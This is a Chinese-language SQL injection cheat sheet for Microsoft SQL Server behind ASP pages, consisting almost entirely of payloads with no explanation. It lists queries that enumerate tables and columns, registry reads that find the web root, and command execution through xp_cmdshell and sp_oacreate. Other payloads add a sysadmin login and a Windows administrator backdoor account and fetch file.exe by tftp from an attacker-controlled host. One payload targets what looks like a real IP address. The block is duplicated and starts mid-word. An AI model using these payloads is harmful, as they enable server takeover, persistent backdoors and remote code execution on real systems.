非常经典的Ms Sql注射资料
ysobjects where xtype=''U'') 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=''U'' and name not in(''Address''))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=''U'' and name=''admin'' and uid>(str(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=''HKEY_LOCAL_MACHINE'', @key=''SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\'', @value_name=''/'', values=@test OUTPUT insert into paths(path) values(@test)
http://61.131.96.39/PageShow.asp?TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--
得到了web路径d:\xxxx,接下来:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--
传统的存在xp_cmdshell的测试过程:
;exec master..xp_cmdshell ''dir''
;exec master.dbo.sp_addlogin hax;--
;exec master.dbo.sp_password null,hax,hax;--
;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
;exec master.dbo.xp_cmdshell ''net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add'';--
;exec master.dbo.xp_cmdshell ''net localgroup administrators hax /add'';--
exec master..xp_servicecontrol ''start'', ''schedule''
exec master..xp_servicecontrol ''start'', ''server''
http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate ''wscript.shell'',@shell OUTPUT EXEC SP_OAMETHOD @shell,''run'',null, ''C:\WINNT\system32\cmd.exe /c net user swap 5258 /add''
;DECLARE @shell INT EXEC SP_OAcreate ''wscript.shell'',@shell OUTPUT EXEC SP_OAMETHOD @shell,''run'',null, ''C:\WINNT\system32\cmd.exe /c net localgroup administrators swap/add''
http://localhost/show.asp?id=1''; exec master..xp_cmdshell ''tftp -i youip get file.exe''-
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=''U'' and name not in(''Address''))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=''U'' and name=''admin'' and uid>(str(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=''HKEY_LOCAL_MACHINE'', @key=''SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\'', @value_name=''/'', values=@test OUTPUT insert into paths(path) values(@test)
http://61.131.96.39/PageShow.asp?TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--
得到了web路径d:\xxxx,接下来:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--
传统的存在xp_cmdshell的测试过程:
;exec master..xp_cmdshell ''dir''
;exec master.dbo.sp_addlogin hax;--
;exec master.dbo.sp_password null,hax,hax;--
;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
;exec master.dbo.xp_cmdshell ''net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add'';--
;exec master.dbo.xp_cmdshell ''net localgroup administrators hax /add'';--
exec master..xp_servicecontrol ''start'', ''schedule''
exec master..xp_servicecontrol ''start'', ''server''
http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate ''wscript.shell'',@shell OUTPUT EXEC SP_OAMETHOD @shell,''run'',null, ''C:\WINNT\system32\cmd.exe /c net user swap 5258 /add''
;DECLARE @shell INT EXEC SP_OAcreate ''wscript.shell'',@shell OUTPUT EXEC SP_OAMETHOD @shell,''run'',null, ''C:\WINNT\system32\cmd.exe /c net localgroup administrators swap/add''
http://localhost/show.asp?id=1''; exec master..xp_cmdshell ''tftp -i youip get file.exe''-